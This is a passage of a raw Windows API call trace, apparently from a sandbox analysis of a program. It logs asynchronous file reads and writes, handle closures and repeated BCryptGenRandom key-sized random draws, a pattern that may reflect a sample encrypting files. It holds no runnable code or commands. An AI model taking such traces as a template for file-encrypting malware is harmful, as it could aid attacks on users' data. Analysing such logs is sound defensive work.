lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0176.256] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.270] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x5b40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0176.270] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.274] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x43b0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0176.275] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.328] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x51a8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0176.339] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.366] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.367] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.367] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0176.367] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.367] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.367] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0176.367] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.368] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.368] free (_Block=0x3e305b8) [0176.368] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.368] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.368] free (_Block=0x1fa91d0) [0176.368] free (_Block=0x1fa2ed8) [0176.368] free (_Block=0x1fa90b8) [0176.368] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0176.368] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.381] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x54b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0176.381] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.384] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xa8a6, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0176.398] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.410] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.411] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0176.411] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.412] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0176.412] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0176.412] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0176.412] free (_Block=0x3e305b8) [0176.412] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0176.412] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0176.413] free (_Block=0x1fa91d0) [0176.413] free (_Block=0x1fa2ed8) [0176.413] free (_Block=0x1fa90b8) [0176.413] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0176.413] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.414] WriteFile (in: hFile=0x2a8, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x2570, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0176.415] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.415] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x6cb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0176.415] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.568] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3086, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0176.578] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.590] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1d14, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0176.601] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.612] ReadFile (in: hFile=0x170, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x23a8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0176.624] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.647] CloseHandle (hObject=0x170) returned 1 [0176.647] free (_Block=0x3e70008) [0176.647] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.658] CloseHandle (hObject=0x2a4) returned 1 [0176.658] free (_Block=0x1ff1e60) [0176.658] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.668] CloseHandle (hObject=0x338) returned 1 [0176.668] free (_Block=0x3ef0008) [0176.668] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.674] CloseHandle (hObject=0x308) returned 1 [0176.674] free (_Block=0x3d70450) [0176.674] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.676] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x1fe0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0176.676] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0176.678] WriteFile (in: hFile=0x170, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x2c30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0176.678] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.041] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1b4a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0177.052] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.061] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0177.061] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.067] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0177.067] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.076] WriteFile (in: hFile=0x2a4, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0177.076] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.078] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xe88, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.078] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.079] CloseHandle (hObject=0x338) returned 1 [0177.079] free (_Block=0x1ff1e60) [0177.079] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.081] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4c4c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0177.082] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.082] CloseHandle (hObject=0x3cc) returned 1 [0177.082] free (_Block=0x3df0008) [0177.082] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.094] CloseHandle (hObject=0x2a8) returned 1 [0177.094] free (_Block=0x3f70048) [0177.094] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.111] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x818, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0177.111] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.111] CloseHandle (hObject=0x2a8) returned 1 [0177.111] free (_Block=0x3df0008) [0177.111] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.121] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xa94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.122] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.122] CloseHandle (hObject=0x170) returned 1 [0177.122] free (_Block=0x1ff1e60) [0177.122] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.132] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x38c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0177.132] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.133] CloseHandle (hObject=0x2a8) returned 1 [0177.133] free (_Block=0x3df0008) [0177.133] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.143] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x61c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.143] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.144] CloseHandle (hObject=0x170) returned 1 [0177.144] free (_Block=0x1ff1e60) [0177.144] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.151] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xaf0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0177.151] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.151] CloseHandle (hObject=0x2a8) returned 1 [0177.151] free (_Block=0x3df0008) [0177.151] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.164] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xa68, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0177.164] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.165] CloseHandle (hObject=0x2a8) returned 1 [0177.165] free (_Block=0x3df0008) [0177.165] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.171] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x30e4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.172] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.172] CloseHandle (hObject=0x170) returned 1 [0177.172] free (_Block=0x1ff1e60) [0177.172] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.188] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x17a1c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0177.189] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.189] CloseHandle (hObject=0x170) returned 1 [0177.189] free (_Block=0x3df0008) [0177.189] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.201] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x670, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.201] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.201] CloseHandle (hObject=0x2a8) returned 1 [0177.201] free (_Block=0x1ff1e60) [0177.201] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.214] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x5b4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0177.214] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0177.214] CloseHandle (hObject=0x170) returned 1 [0177.214] free (_Block=0x3df0008) [0177.214] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, 